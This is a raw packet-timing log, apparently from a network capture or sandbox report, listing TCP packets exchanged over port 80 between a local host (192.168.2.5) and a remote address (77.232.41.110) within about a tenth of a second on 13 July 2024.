                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711112022 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711144924 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711177111 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711215973 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711215973 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711241961 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711245060 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711258888 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711352110 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711385965 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711419106 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711435080 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711435080 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711453915 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711487055 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711519957 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711520910 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711564064 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711590052 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711633921 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.711633921 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750441074 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750531912 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750566006 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750600100 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750633955 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750647068 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750647068 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750647068 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750668049 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750701904 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750718117 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750735998 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750767946 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750802040 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750812054 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750812054 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750834942 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750870943 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750904083 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750936985 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750940084 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750973940 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750983953 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.750983953 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.751282930 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752547979 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752619028 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752640009 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752654076 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752674103 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752691031 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752701044 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752742052 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752743006 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752778053 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752803087 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752820969 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752829075 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752878904 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752908945 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752942085 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752949953 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752949953 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752975941 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.752993107 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753010988 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753021002 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753045082 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753077984 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753091097 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753091097 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753122091 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753130913 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753171921 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753206015 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753238916 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753248930 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753248930 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753273010 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753293037 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753323078 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753359079 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753359079 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753361940 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753395081 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753428936 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753470898 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.753470898 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795171022 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795244932 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795279980 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795314074 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795347929 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795381069 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795414925 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795449018 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795481920 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795485020 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795485020 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795516014 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795551062 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795572042 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795572042 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795572042 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795572042 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795572042 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795584917 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795592070 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795619965 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795655012 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795664072 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795664072 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795689106 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795722961 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795732021 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795732021 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795756102 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795789003 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795803070 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795803070 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795823097 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795855999 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795865059 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795865059 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795890093 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795922041 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795932055 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795932055 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795955896 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795964956 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.795989037 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796021938 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796055079 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796087980 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796092987 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796092987 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796128035 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796140909 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796175003 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796207905 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796257973 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796291113 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796303034 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796303034 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796325922 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796358109 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796391010 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796392918 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796392918 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796422958 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796456099 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796502113 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796502113 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796519041 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796552896 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796566010 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796586037 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796619892 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796627998 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796627998 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796652079 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796667099 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796684980 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796717882 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796726942 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796726942 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796751976 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796785116 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796793938 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796793938 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796821117 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.796835899 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797041893 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797043085 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797074080 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797107935 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797141075 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797158003 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797158957 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797173023 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797199965 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797208071 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797241926 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797275066 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797307968 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797318935 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797318935 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797339916 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797393084 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797425985 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797435999 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797436953 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797461033 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797492981 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797532082 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797532082 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797547102 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797579050 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797612906 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797633886 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797646046 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797658920 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797704935 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797755957 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797790051 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797820091 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797821999 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797893047 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797908068 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797941923 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797959089 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797959089 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797975063 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.797988892 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.798023939 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.798029900 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.798057079 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.798089027 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.798101902 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.798101902 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.798124075 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.798156977 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.798190117 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.798201084 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.798201084 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.798439026 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837330103 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837399960 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837423086 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837459087 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837512970 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837513924 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837512970 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837548018 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837583065 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837587118 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837588072 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837615967 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837650061 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837658882 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837658882 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837682962 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837718010 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837729931 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837729931 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837750912 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837784052 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837817907 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837847948 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837847948 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837852001 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837893963 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.837893963 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.839534044 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.839596987 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.839603901 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.839641094 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.839674950 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.839709997 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.839718103 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.839718103 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.839742899 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.839781046 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.839832067 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.839832067 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.840471029 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.840524912 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.840550900 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.840603113 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.840610027 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.840637922 CEST805897977.232.41.110192.168.2.5
